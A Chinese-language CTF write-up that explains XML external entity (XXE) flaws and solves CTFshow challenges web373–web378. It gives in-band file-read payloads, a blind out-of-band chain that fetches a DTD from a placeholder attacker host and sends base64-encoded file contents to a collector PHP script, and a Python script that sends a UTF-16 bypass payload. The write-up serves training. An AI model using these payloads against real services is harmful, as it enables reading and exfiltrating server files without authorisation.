CTFSHOW

admin管理员组

文章数量:1794759

CTFSHOW

XML

XML即 可扩展标记语言（EXtensible Markup Language），是一种标记语言，其标签没有预定义，您需要自行定义标签，是W3C的推荐标准。其于HTML的区别是：

• HTML 被设计用来显示数据
• XML 被设计用来传输和存储数据

XML文档结构包括：

• XML声明
• DTD文档类型定义（可选）
• 文档元素

XML是一种非常流行的标记语言，在1990年代后期首次标准化，并被无数的软件项目所采用。它用于配置文件，文档格式（如OOXML，ODF，PDF，RSS，...），图像格式（SVG，EXIF标题）和网络协议（webDAV，CalDAV，XMLRPC，SOAP，XMPP，SAML， XACML，...），他应用的如此的普遍以至于他出现的任何问题都会带来灾难性的结果。

在解析外部实体的过程中，XML解析器可以根据URL中指定的方案（协议）来查询各种网络协议和服务（DNS，FTP，HTTP，SMB等）。 外部实体对于在文档中创建动态引用非常有用，这样对引用资源所做的任何更改都会在文档中自动更新。 但是，在处理外部实体时，可以针对应用程序启动许多攻击。 这些攻击包括泄露本地系统文件，这些文件可能包含密码和私人用户数据等敏感数据，或利用各种方案的网络访问功能来操纵内部应用程序。 通过将这些攻击与其他实现缺陷相结合，这些攻击的范围可以扩展到客户端内存损坏，任意代码执行，甚至服务中断，具体取决于这些攻击的上下文。

XXE漏洞主要针对web服务危险的引用的外部实体并且未对外部实体进行敏感字符的过滤，从而可以造成命令执行，目录遍历等。

对于传统的XXE来说，要求攻击者只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件，如果没有回显则可以使用Blind XXE漏洞来构建一条带外信道提取数据。

xxe漏洞存在是因为XML解析器解析了用户发送的不可信数据。然而，要去校验DTD(document type definition)中SYSTEM标识符定义的数据，并不容易，也不大可能。大部分的XML解析器默认对于XXE攻击是脆弱的。因此，最好的解决办法就是配置XML处理器去使用本地静态的DTD，不允许XML中含有任何自己声明的DTD。通过设置相应的属性值为false，XML外部实体攻击就能够被阻止。因此，可将外部实体、参数实体和内联DTD 都被设置为false，从而避免基于XXE漏洞的攻击。

web373

题目给出源码，一个有回显的文件读取漏洞

<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_import_dom($dom); $CTFSHOW = $creds->ctfshow; echo $ctfshow; } highlight_file(__FILE__); ?>

抓包发送如下内容

<?xml version="1.0"?> <!DOCTYPE xml [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <H3rmesk1t> <ctfshow> &xxe; </ctfshow> </H3rmesk1t>

得到flag 

web374

无回显的文件读取，需要进行外带

<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); } highlight_file(__FILE__); ?>

抓包发送如下内容

<!DOCTYPE ANY[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % remote SYSTEM "xxx.xxx.xxx.xxx:xxxx/xxe.xml"> %remote; %send; ]>

在服务器放置xxe.php 和 xxe.xml 两个文件

<?php $content = $_GET['1']; if(isset($content)){ file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\\n".$content); }else{ echo 'no data input'; } <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'" > %all; web375

无回显的文件读取，且禁用了版本号，和上面一样进行外带不写版本号即可

<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(preg_match('/<\\?xml version="1\\.0"/', $xmlfile)){ die('error'); } if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); } highlight_file(__FILE__); ?>

抓包发送如下内容

<!DOCTYPE ANY[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % remote SYSTEM "xxx.xxx.xxx.xxx:xxxx/xxe.xml"> %remote; %send; ]>

在服务器放置xxe.php 和 xxe.xml 两个文件

<?php $content = $_GET['1']; if(isset($content)){ file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\\n".$content); }else{ echo 'no data input'; } <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'" > %all; web376

无回显的文件读取，且禁用了版本号，和上面一样进行外带不写版本号即可

<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(preg_match('/<\\?xml version="1\\.0"/i', $xmlfile)){ die('error'); } if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); } highlight_file(__FILE__); ?>

抓包发送如下内容

<!DOCTYPE ANY[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % remote SYSTEM "xxx.xxx.xxx.xxx:xxxx/xxe.xml"> %remote; %send; ]>

在服务器放置xxe.php 和 xxe.xml 两个文件

<?php $content = $_GET['1']; if(isset($content)){ file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\\n".$content); }else{ echo 'no data input'; } <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'" > %all; web377

payload

import requests url = 'ddca1082-2f62-4f7f-b8b1-e369e33aa168.chall.ctf.show/' payload = """<!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % aaa SYSTEM "xxx/test.dtd"> %aaa; ]> <root>123</root>""" payload = payload.encode('utf-16') requests.post(url ,data=payload)

开监听拿flag

web378 <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <user><username>&xxe;</username><password>&xxe;</password></user>

本文标签： CTFSHOW